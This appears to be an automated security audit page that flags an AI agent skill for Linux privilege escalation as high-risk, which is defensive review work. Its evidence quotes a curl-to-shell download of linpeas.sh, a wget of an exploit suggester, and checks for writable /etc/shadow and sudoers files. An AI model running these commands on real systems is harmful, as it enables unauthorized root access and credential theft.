Skills
skills/mukul975/anthropic-cybersecurity-skills/performing-privilege-escalation-on-linux/Gen Agent Trust Hub

performing-privilege-escalation-on-linux

Fail

Audited by Gen Agent Trust Hub on Apr 7, 2026

Risk Level: HIGHREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONDATA_EXFILTRATIONEXTERNAL_DOWNLOADS
Full Analysis
  • [REMOTE_CODE_EXECUTION]: The workflows.md file contains instructions for downloading and executing remote scripts in a single command pipeline (curl-to-shell), which is a high-risk pattern for arbitrary code execution.
  • Evidence: curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh in references/workflows.md.
  • [EXTERNAL_DOWNLOADS]: The skill facilitates the download and execution of multiple third-party tools from unverified GitHub repositories.
  • Evidence: wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh in references/workflows.md.
  • [DATA_EXFILTRATION]: The scripts/agent.py script performs discovery of sensitive system files that are commonly targeted for credential harvesting or privilege escalation.
  • Evidence: The script checks for write access to /etc/shadow, /etc/passwd, and /etc/sudoers in the check_writable_files function.
  • [COMMAND_EXECUTION]: The scripts/agent.py script uses the subprocess module to execute a wide variety of system-level enumeration commands.
  • Evidence: Functions like enumerate_system_info, check_sudo_permissions, and find_suid_binaries execute commands such as uname -a, sudo -l, and find / -perm -4000.
  • [COMMAND_EXECUTION]: Documentation provides detailed workflows for escaping restricted environments and gaining root access by abusing system binaries and kernel vulnerabilities.
  • Evidence: Examples for abusing SUID binaries like find and python3 to spawn root shells are provided in references/workflows.md.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Apr 7, 2026, 12:58 PM